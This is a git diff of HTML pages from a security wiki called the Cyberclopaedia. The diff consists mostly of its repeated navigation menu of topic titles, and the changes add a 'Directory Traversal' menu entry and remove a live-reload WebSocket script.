        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html b/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html index ac776dac..2c2639c4 100644 --- a/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html +++ b/docs/Cryptography/Key Management/Key Exchange/Diffie-Hellman Key Exchange.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -243,22 +243,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html b/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html index 34e9ef91..d9ab9e05 100644 --- a/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html +++ b/docs/Cryptography/Key Management/Key Exchange/Security Definitions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
